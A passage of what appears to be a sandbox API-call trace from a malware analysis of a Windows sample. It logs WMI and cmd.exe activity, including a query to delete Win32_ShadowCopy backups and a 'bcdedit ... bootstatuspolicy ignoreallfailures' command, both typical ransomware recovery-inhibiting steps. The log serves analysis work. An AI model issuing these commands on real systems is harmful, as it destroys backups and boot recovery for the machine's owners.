lstrlenW (lpString="GET") returned 3 [0043.941] lstrlenW (lpString="delete") returned 6 [0043.942] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0043.942] lstrlenW (lpString="LIST") returned 4 [0043.942] lstrlenW (lpString="delete") returned 6 [0043.942] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0043.942] lstrlenW (lpString="SET") returned 3 [0043.942] lstrlenW (lpString="delete") returned 6 [0043.942] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0043.942] lstrlenW (lpString="CALL") returned 4 [0043.942] lstrlenW (lpString="delete") returned 6 [0043.942] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0043.942] lstrlenW (lpString="ASSOC") returned 5 [0043.942] lstrlenW (lpString="delete") returned 6 [0043.942] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0043.942] lstrlenW (lpString="CREATE") returned 6 [0043.942] lstrlenW (lpString="delete") returned 6 [0043.942] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0043.942] lstrlenW (lpString="DELETE") returned 6 [0043.942] lstrlenW (lpString="delete") returned 6 [0043.942] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0043.943] malloc (_Size=0x18) returned 0x409680 [0043.943] lstrlenA (lpString="") returned 0 [0043.943] malloc (_Size=0x2) returned 0x2fdfb0 [0043.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3e314c, cbMultiByte=-1, lpWideCharStr=0x2fdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0043.943] free (_Block=0x2fdfb0) [0043.943] malloc (_Size=0x18) returned 0x409700 [0043.943] lstrlenA (lpString="") returned 0 [0043.943] malloc (_Size=0x2) returned 0x2fdfb0 [0043.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3e314c, cbMultiByte=-1, lpWideCharStr=0x2fdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0043.943] free (_Block=0x2fdfb0) [0043.943] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0043.943] malloc (_Size=0x3e) returned 0x40cad0 [0043.943] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0043.943] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff70 | out: _String="Select", _Context=0xffffffffffffff70) returned="Select" [0043.943] malloc (_Size=0x18) returned 0x4097a0 [0043.943] free (_Block=0x409700) [0043.943] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53009f006c0005 | out: _String=0x0, _Context=0x53009f006c0005) returned="*" [0043.943] lstrlenW (lpString="FROM") returned 4 [0043.943] lstrlenW (lpString="*") returned 1 [0043.943] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0043.943] malloc (_Size=0x18) returned 0x409700 [0043.943] free (_Block=0x4097a0) [0043.943] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x5300a0006c0005 | out: _String=0x0, _Context=0x5300a0006c0005) returned="from" [0043.943] lstrlenW (lpString="FROM") returned 4 [0043.943] lstrlenW (lpString="from") returned 4 [0043.943] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0043.943] malloc (_Size=0x18) returned 0x4097a0 [0043.943] free (_Block=0x409700) [0043.943] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x5300a1006c0005 | out: _String=0x0, _Context=0x5300a1006c0005) returned="Win32_ShadowCopy" [0043.943] malloc (_Size=0x18) returned 0x409700 [0043.944] free (_Block=0x4097a0) [0043.944] free (_Block=0x40cad0) [0043.944] malloc (_Size=0x18) returned 0x4097a0 [0043.944] malloc (_Size=0x18) returned 0x4096a0 [0043.944] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0043.944] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0043.944] free (_Block=0x409680) [0043.944] free (_Block=0x4097a0) [0043.944] ??0CHString@@QEAA@XZ () returned 0xff940 [0043.944] GetCurrentThreadId () returned 0xb54 [0043.944] malloc (_Size=0x18) returned 0x4097a0 [0043.944] malloc (_Size=0x18) returned 0x409680 [0043.944] malloc (_Size=0x18) returned 0x409720 [0043.944] malloc (_Size=0x18) returned 0x409740 [0043.944] malloc (_Size=0x18) returned 0x409760 [0043.944] SysStringLen (param_1="\\\\") returned 0x2 [0043.944] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0043.944] malloc (_Size=0x18) returned 0x409780 [0043.944] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0043.944] SysStringLen (param_1="\\") returned 0x1 [0043.944] malloc (_Size=0x18) returned 0x40cb00 [0043.945] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0043.945] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0043.945] free (_Block=0x409780) [0043.945] free (_Block=0x409760) [0043.945] free (_Block=0x409740) [0043.945] free (_Block=0x409720) [0043.945] free (_Block=0x409680) [0043.945] free (_Block=0x4097a0) [0043.945] malloc (_Size=0x18) returned 0x4097a0 [0043.945] malloc (_Size=0x18) returned 0x409680 [0043.945] malloc (_Size=0x18) returned 0x409720 [0043.945] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e31390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4529d0 | out: ppNamespace=0xff4529d0*=0x1e43c18) returned 0x0 [0043.992] free (_Block=0x409720) [0043.992] free (_Block=0x409680) [0043.992] free (_Block=0x4097a0) [0043.992] CoSetProxyBlanket (pProxy=0x1e43c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0043.993] free (_Block=0x40cb00) [0043.993] ??1CHString@@QEAA@XZ () returned 0x7fef873482c [0043.993] ??0CHString@@QEAA@XZ () returned 0xff890 [0043.993] GetCurrentThreadId () returned 0xb54 [0043.993] malloc (_Size=0x18) returned 0x4097a0 [0043.993] lstrlenA (lpString="") returned 0 [0043.993] malloc (_Size=0x2) returned 0x2fdfb0 [0043.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3e314c, cbMultiByte=-1, lpWideCharStr=0x2fdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0043.993] free (_Block=0x2fdfb0) [0043.993] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0043.993] SysStringLen (param_1="") returned 0x0 [0043.993] free (_Block=0x4097a0) [0043.993] malloc (_Size=0x18) returned 0x4097a0 [0043.993] IWbemServices:ExecQuery (in: This=0x1e43c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0xff898 | out: ppEnum=0xff898*=0x1e43d18) returned 0x0 [0077.585] free (_Block=0x4097a0) [0077.585] CoSetProxyBlanket (pProxy=0x1e43d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0077.588] IEnumWbemClassObject:Next (in: This=0x1e43d18, lTimeout=-1, uCount=0x1, apObjects=0xff8a0, puReturned=0xff8b0 | out: apObjects=0xff8a0*=0x0, puReturned=0xff8b0*=0x0) returned 0x1 [0077.588] IUnknown:Release (This=0x1e43d18) returned 0x0 [0077.589] ??1CHString@@QEAA@XZ () returned 0x7fef873482c [0077.589] free (_Block=0x409700) [0077.589] free (_Block=0x4096a0) [0077.589] GetCurrentThreadId () returned 0xb54 [0077.589] ??0CHString@@QEAA@PEBG@Z () returned 0xffa78 [0077.589] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xffa78 [0077.590] malloc (_Size=0x800) returned 0x40d350 [0077.590] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x40d350, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0077.590] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0077.590] malloc (_Size=0x1c) returned 0x40d2d0 [0077.590] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x40d2d0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0077.590] fprintf (in: _File=0x7fefdb62ab0, _Format="%s" | out: _File=0x7fefdb62ab0) returned 27 [0077.591] fflush (in: _File=0x7fefdb62ab0 | out: _File=0x7fefdb62ab0) returned 0 [0077.591] free (_Block=0x40d2d0) [0077.591] free (_Block=0x40d350) [0077.591] ??1CHString@@QEAA@XZ () returned 0x49f6ad01 [0077.591] WbemLocator:IUnknown:Release (This=0x1e43c18) returned 0x0 [0077.592] ?Empty@CHString@@QEAAXXZ () returned 0x7fef873482c [0077.592] _kbhit () returned 0x0 [0077.593] free (_Block=0x40cab0) [0077.593] free (_Block=0x4095a0) [0077.593] free (_Block=0x409580) [0077.593] free (_Block=0x409560) [0077.593] free (_Block=0x409040) [0077.594] free (_Block=0x4085c0) [0077.594] free (_Block=0x409640) [0077.594] free (_Block=0x408640) [0077.594] free (_Block=0x4096c0) [0077.594] free (_Block=0x40ca40) [0077.594] free (_Block=0x409660) [0077.594] free (_Block=0x4096e0) [0077.594] free (_Block=0x40ca90) [0077.594] free (_Block=0x406d20) [0077.594] free (_Block=0x406dc0) [0077.594] ?Empty@CHString@@QEAAXXZ () returned 0x7fef873482c [0077.594] free (_Block=0x408600) [0077.594] free (_Block=0x4095e0) [0077.594] free (_Block=0x409600) [0077.594] free (_Block=0x406400) [0077.594] free (_Block=0x406450) [0077.594] free (_Block=0x4064a0) [0077.594] free (_Block=0x4095c0) [0077.594] free (_Block=0x406540) [0077.594] free (_Block=0x406d00) [0077.594] free (_Block=0x408040) [0077.594] free (_Block=0x4068e0) [0077.594] free (_Block=0x408000) [0077.594] free (_Block=0x406880) [0077.594] free (_Block=0x4068a0) [0077.594] free (_Block=0x406760) [0077.594] free (_Block=0x406780) [0077.595] free (_Block=0x406700) [0077.595] free (_Block=0x406720) [0077.595] free (_Block=0x4067c0) [0077.595] free (_Block=0x4067e0) [0077.595] free (_Block=0x406820) [0077.595] free (_Block=0x406840) [0077.595] free (_Block=0x406640) [0077.595] free (_Block=0x406660) [0077.595] free (_Block=0x4065e0) [0077.595] free (_Block=0x406600) [0077.595] free (_Block=0x4066a0) [0077.595] free (_Block=0x4066c0) [0077.595] free (_Block=0x406580) [0077.595] free (_Block=0x4065a0) [0077.595] free (_Block=0x4064f0) [0077.595] free (_Block=0x407fa0) [0077.595] free (_Block=0x406e50) [0077.595] WbemLocator:IUnknown:Release (This=0x1e31390) returned 0x2 [0077.595] WbemLocator:IUnknown:Release (This=0x1e43b28) returned 0x0 [0077.598] WbemLocator:IUnknown:Release (This=0x1e43a98) returned 0x0 [0077.598] WbemLocator:IUnknown:Release (This=0x1e31390) returned 0x1 [0077.598] ?Empty@CHString@@QEAAXXZ () returned 0x7fef873482c [0077.598] WbemLocator:IUnknown:Release (This=0x1e31390) returned 0x0 [0077.598] free (_Block=0x4094e0) [0077.598] free (_Block=0x409500) [0077.598] free (_Block=0x408540) [0077.598] free (_Block=0x409520) [0077.598] free (_Block=0x409540) [0077.598] free (_Block=0x408580) [0077.598] free (_Block=0x409360) [0077.598] free (_Block=0x409380) [0077.598] free (_Block=0x4083c0) [0077.599] free (_Block=0x4093a0) [0077.599] free (_Block=0x4093c0) [0077.599] free (_Block=0x408400) [0077.599] free (_Block=0x4092e0) [0077.599] free (_Block=0x409300) [0077.599] free (_Block=0x408340) [0077.599] free (_Block=0x409320) [0077.599] free (_Block=0x409340) [0077.599] free (_Block=0x408380) [0077.599] free (_Block=0x409460) [0077.599] free (_Block=0x409480) [0077.599] free (_Block=0x4084c0) [0077.599] free (_Block=0x4094a0) [0077.599] free (_Block=0x4094c0) [0077.599] free (_Block=0x408500) [0077.599] free (_Block=0x409260) [0077.599] free (_Block=0x409280) [0077.599] free (_Block=0x4082c0) [0077.599] free (_Block=0x4092a0) [0077.599] free (_Block=0x4092c0) [0077.599] free (_Block=0x408300) [0077.599] free (_Block=0x4093e0) [0077.599] free (_Block=0x409400) [0077.599] free (_Block=0x408440) [0077.599] free (_Block=0x409420) [0077.599] free (_Block=0x409440) [0077.599] free (_Block=0x408480) [0077.600] free (_Block=0x4091a0) [0077.600] free (_Block=0x4091c0) [0077.600] free (_Block=0x408200) [0077.600] free (_Block=0x409060) [0077.600] free (_Block=0x409080) [0077.600] free (_Block=0x4080c0) [0077.600] free (_Block=0x409020) [0077.600] free (_Block=0x409000) [0077.600] free (_Block=0x408080) [0077.600] free (_Block=0x4090e0) [0077.600] free (_Block=0x409100) [0077.600] free (_Block=0x408140) [0077.600] free (_Block=0x4091e0) [0077.600] free (_Block=0x409200) [0077.600] free (_Block=0x408240) [0077.600] free (_Block=0x4090a0) [0077.600] free (_Block=0x4090c0) [0077.600] free (_Block=0x408100) [0077.600] free (_Block=0x409120) [0077.600] free (_Block=0x409140) [0077.600] free (_Block=0x408180) [0077.600] free (_Block=0x409160) [0077.600] free (_Block=0x409180) [0077.600] free (_Block=0x4081c0) [0077.600] free (_Block=0x409220) [0077.600] free (_Block=0x409240) [0077.600] free (_Block=0x408280) [0077.601] CoUninitialize () [0077.639] exit (_Code=0) [0077.639] free (_Block=0x406d70) [0077.639] free (_Block=0x407c30) [0077.639] ??1CHString@@QEAA@XZ () returned 0x7fef873482c [0077.639] free (_Block=0x406e00) [0077.639] free (_Block=0x406560) [0077.639] free (_Block=0x407bf0) [0077.639] free (_Block=0x407bb0) [0077.639] free (_Block=0x407b60) [0077.639] free (_Block=0x407b20) [0077.639] free (_Block=0x407ac0) [0077.639] free (_Block=0x405a90) [0077.639] free (_Block=0x405a50) [0077.639] ??1CHString@@QEAA@XZ () returned 0x7fef873482c [0077.639] free (_Block=0x409620) Thread: id = 25 os_tid = 0xbb8 Thread: id = 47 os_tid = 0xbd0 Thread: id = 48 os_tid = 0xbdc Thread: id = 49 os_tid = 0xbe0 Thread: id = 50 os_tid = 0xbe4 Process: id = "7" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x49b04000" os_pid = "0xb78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa44" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C Bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 22 os_tid = 0xb7c [0042.082] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f810 | out: lpSystemTimeAsFileTime=0x18f810*(dwLowDateTime=0x2c584760, dwHighDateTime=0x18d1aee)) [0042.083] GetCurrentProcessId () returned 0xb78 [0042.083] GetCurrentThreadId () returned 0xb7c [0042.083] GetTickCount () returned 0x1a10f [0042.083] QueryPerformanceCounter (in: lpPerformanceCount=0x18f818 | out: lpPerformanceCount=0x18f818*=16235166296) returned 1 [0042.084] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000 [0042.084] __set_app_type (_Type=0x1) [0042.084] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0 [0042.084] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0 [0042.084] GetCurrentThreadId () returned 0xb7c [0042.084] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb7c) returned 0x3c [0042.085] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0042.085] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0042.085] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0042.085] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0042.085] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f7a8 | out: phkResult=0x18f7a8*=0x0) returned 0x2 [0042.085] VirtualQuery (in: lpAddress=0x18f790, lpBuffer=0x18f710, dwLength=0x30 | out: lpBuffer=0x18f710*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0042.085] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f710, dwLength=0x30 | out: lpBuffer=0x18f710*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0042.085] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f710, dwLength=0x30 | out: lpBuffer=0x18f710*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0042.085] VirtualQuery (in: lpAddress=0x94000, lpBuffer=0x18f710, dwLength=0x30 | out: lpBuffer=0x18f710*(BaseAddress=0x94000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0042.085] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f710, dwLength=0x30 | out: lpBuffer=0x18f710*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0042.085] GetConsoleOutputCP () returned 0x1b5 [0042.085] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1 [0042.086] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1 [0042.086] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.086] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0042.086] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.086] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1 [0042.086] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.086] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0042.086] _get_osfhandle (_FileHandle=0) returned 0x3 [0042.086] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1 [0042.087] _get_osfhandle (_FileHandle=0) returned 0x3 [0042.087] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0042.087] GetEnvironmentStringsW () returned 0x378b50* [0042.087] GetProcessHeap () returned 0x360000 [0042.087] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xa7c) returned 0x3795e0 [0042.087] FreeEnvironmentStringsW (penv=0x378b50) returned 1 [0042.087] GetProcessHeap () returned 0x360000 [0042.087] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x8) returned 0x3783d0 [0042.087] GetEnvironmentStringsW () returned 0x378b50* [0042.087] GetProcessHeap () returned 0x360000 [0042.087] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xa7c) returned 0x37a070 [0042.087] FreeEnvironmentStringsW (penv=0x378b50) returned 1 [0042.088] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e668 | out: phkResult=0x18e668*=0x44) returned 0x0 [0042.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e660, lpData=0x18e680, lpcbData=0x18e664*=0x1000 | out: lpType=0x18e660*=0x0, lpData=0x18e680*=0x18, lpcbData=0x18e664*=0x1000) returned 0x2 [0042.088] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e660, lpData=0x18e680, lpcbData=0x18e664*=0x1000 | out: lpType=0x18e660*=0x4, lpData=0x18e680*=0x1, lpcbData=0x18e664*=0x4) returned 0x0 [0042.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e660, lpData=0x18e680, lpcbData=0x18e664*=0x1000 | out: lpType=0x18e660*=0x0, lpData=0x18e680*=0x1, lpcbData=0x18e664*=0x1000) returned 0x2 [0042.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e660, lpData=0x18e680, lpcbData=0x18e664*=0x1000 | out: lpType=0x18e660*=0x4, lpData=0x18e680*=0x0, lpcbData=0x18e664*=0x4) returned 0x0 [0042.088] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e660, lpData=0x18e680, lpcbData=0x18e664*=0x1000 | out: lpType=0x18e660*=0x4, lpData=0x18e680*=0x40, lpcbData=0x18e664*=0x4) returned 0x0 [0042.088] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e660, lpData=0x18e680, lpcbData=0x18e664*=0x1000 | out: lpType=0x18e660*=0x4, lpData=0x18e680*=0x40, lpcbData=0x18e664*=0x4) returned 0x0 [0042.088] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e660, lpData=0x18e680, lpcbData=0x18e664*=0x1000 | out: lpType=0x18e660*=0x0, lpData=0x18e680*=0x40, lpcbData=0x18e664*=0x1000) returned 0x2 [0042.088] RegCloseKey (hKey=0x44) returned 0x0 [0042.088] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e668 | out: phkResult=0x18e668*=0x44) returned 0x0 [0042.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e660, lpData=0x18e680, lpcbData=0x18e664*=0x1000 | out: lpType=0x18e660*=0x0, lpData=0x18e680*=0x40, lpcbData=0x18e664*=0x1000) returned 0x2 [0042.088] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e660, lpData=0x18e680, lpcbData=0x18e664*=0x1000 | out: lpType=0x18e660*=0x4, lpData=0x18e680*=0x1, lpcbData=0x18e664*=0x4) returned 0x0 [0042.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e660, lpData=0x18e680, lpcbData=0x18e664*=0x1000 | out: lpType=0x18e660*=0x0, lpData=0x18e680*=0x1, lpcbData=0x18e664*=0x1000) returned 0x2 [0042.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e660, lpData=0x18e680, lpcbData=0x18e664*=0x1000 | out: lpType=0x18e660*=0x4, lpData=0x18e680*=0x0, lpcbData=0x18e664*=0x4) returned 0x0 [0042.088] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e660, lpData=0x18e680, lpcbData=0x18e664*=0x1000 | out: lpType=0x18e660*=0x4, lpData=0x18e680*=0x9, lpcbData=0x18e664*=0x4) returned 0x0 [0042.088] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e660, lpData=0x18e680, lpcbData=0x18e664*=0x1000 | out: lpType=0x18e660*=0x4, lpData=0x18e680*=0x9, lpcbData=0x18e664*=0x4) returned 0x0 [0042.088] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e660, lpData=0x18e680, lpcbData=0x18e664*=0x1000 | out: lpType=0x18e660*=0x0, lpData=0x18e680*=0x9, lpcbData=0x18e664*=0x1000) returned 0x2 [0042.088] RegCloseKey (hKey=0x44) returned 0x0 [0042.088] time (in: timer=0x0 | out: timer=0x0) returned 0x1ad63547ceb [0042.088] srand (_Seed=0x63547ceb) [0042.088] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C Bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" [0042.088] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C Bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" [0042.089] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0042.089] GetProcessHeap () returned 0x360000 [0042.089] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x218) returned 0x37ab00 [0042.089] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x37ab10, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0042.089] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0042.089] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0042.089] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0042.089] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0042.089] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0042.089] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0042.089] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0042.089] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0042.089] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0042.089] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0042.089] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0042.089] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0042.089] GetProcessHeap () returned 0x360000 [0042.089] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3795e0 | out: hHeap=0x360000) returned 1 [0042.089] GetEnvironmentStringsW () returned 0x378b50* [0042.090] GetProcessHeap () returned 0x360000 [0042.090] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xa94) returned 0x37b7c0 [0042.090] FreeEnvironmentStringsW (penv=0x378b50) returned 1 [0042.090] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0042.090] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0042.090] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0042.090] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0042.090] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0042.090] 